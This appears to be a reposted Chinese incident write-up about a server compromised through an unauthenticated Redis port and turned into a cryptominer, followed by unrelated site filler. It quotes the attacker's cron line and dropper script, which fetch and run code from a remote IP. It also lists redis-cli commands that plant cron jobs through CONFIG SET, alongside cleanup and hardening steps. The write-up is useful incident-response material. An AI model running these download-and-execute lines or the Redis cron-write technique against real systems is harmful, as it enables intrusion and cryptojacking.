1、起因:
发现运维平台上没有昨天计划任务相关的数据,登上服务器,才发现crontab被改了[root@58 ~]# crontab -l
*/5 * * * * curl -fsSL http://218.248.40.228:9999/i.sh?6 | sh```
2、处理过程:
①、停掉计划任务:[root@58 ~]# crontab -e
` ②、lastb:查看暴力破解的记录,发现并没有异常
[root@58 ~]# lastb
dev ssh:notty 172.16.1.xx Tue Jun 13 22:49 - 22:49 (00:00)
dev ssh:notty 172.16.1.xx Tue Jun 13 22:32 - 22:32 (00:00) ```
③、查看有毒脚本:[root@58 tmp]$curl -fsSL http://218.248.40.228:9999/i.sh?6
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "/5 * curl -fsSL http://218.248.40.228:9999/i.sh?6 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "/5 * curl -fsSL http://218.248.40.228:9999/i.sh?6 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddg.1009" ]; then
curl -fsSL http://218.248.40.228:9999/1009/ddg.$(uname -m) -o /tmp/ddg.1009fi
chmod +x /tmp/ddg.1009 && /tmp/ddg.1009`
④、ps axu:查看异常进程
root 13715 0.0 0.1 700584 16116 ? Sl Jun18 0:50 /tmp/ddg.1009
root 13796 299 17.2 1756884 1387384 ? SLsl Jun18 4236:14 /tmp/wnTKYg.noaes```
⑤、文件处理:[root@58 ~]# ll /var/spool/cron/crontabs
total 4
-rw-r--r-- 1 root root 62 Jun 19 09:35 root
[root@58 ~]# rm -rf /var/spool/cron/crontabs
[root@58 ~]# ll /tmp/ddg.1009
-rwxr-xr-x 1 root root 8890464 Jun 18 10:09 /tmp/ddg.1009
[root@58 ~]#
[root@58 ~]#
[root@58 ~]# chmod 444 /tmp/ddg.1009
[root@58 ~]# ll /tmp/wnTKYg.noaes
-rwxr-xr-x 1 root root 1365824 Jun 18 10:12 /tmp/wnTKYg.noaes
[root@58 ~]#
[root@58 ~]# chmod 444 /tmp/wnTKYg.noaes
[root@58 ~]# kill -9 13715
[root@58 ~]# kill -9 13796`
⑥、#修改root登陆
3、入侵思考:
①、服务器的iptable是只开了ssh的web的端口,且ssh使用密钥登陆,且没有发现尝试登陆的异常;
②、查看web的日志,没有发现异常访问,应该是某个软件的问题?
③、最后确定是redis无验证挖矿(搜索了linux ddg.1009),阿里云的安全组是允许0.0.0.0的访问的
④、阿里云这个0.0.0.0,巨坑啊,应该是某个贱人从其他阿里云的机器登陆到redis的,即【阿里云的安全组有0.0.0.0的,是可以访问其他不属于自己的机器】
4、安全调整:
①、服务器加上iptables的限制,只允许再用的ip访问
②、redis改成nologin的用户启动
③、redis CONFIG修改成其他的名称:【rename-command CONFIG "Wyl0LFt2UhR"】
④、修改redis端口
5、redis修改计划任务相关命令:
#set 1:这样可以控制第一条记录,就能保证你的内容始终保持在最前面
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
redis-cli flushall```
=============================== 完 ==============================
微信关注我们
转载内容版权归作者及来源网站所有!
低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。
马里奥是站在游戏界顶峰的超人气多面角色。马里奥靠吃蘑菇成长,特征是大鼻子、头戴帽子、身穿背带裤,还留着胡子。与他的双胞胎兄弟路易基一起,长年担任任天堂的招牌角色。
为解决软件依赖安装时官方源访问速度慢的问题,腾讯云为一些软件搭建了缓存服务。您可以通过使用腾讯云软件源站来提升依赖包的安装速度。为了方便用户自由搭建服务架构,目前腾讯云软件源站支持公网访问和内网访问。
Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service 的首字母简称,一个易于构建 AI Agent 应用的动态服务发现、配置管理和AI智能体管理平台。Nacos 致力于帮助您发现、配置和管理微服务及AI智能体应用。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据、流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。
Rocky Linux(中文名:洛基)是由Gregory Kurtzer于2020年12月发起的企业级Linux发行版,作为CentOS稳定版停止维护后与RHEL(Red Hat Enterprise Linux)完全兼容的开源替代方案,由社区拥有并管理,支持x86_64、aarch64等架构。其通过重新编译RHEL源代码提供长期稳定性,采用模块化包装和SELinux安全架构,默认包含GNOME桌面环境及XFS文件系统,支持十年生命周期更新。
扫码在手机上查看文章
扫描二维码,手机阅读更方便
有任何问题或合作意向欢迎联系我们
Email: 99873273@qq.com
QQ: 99873273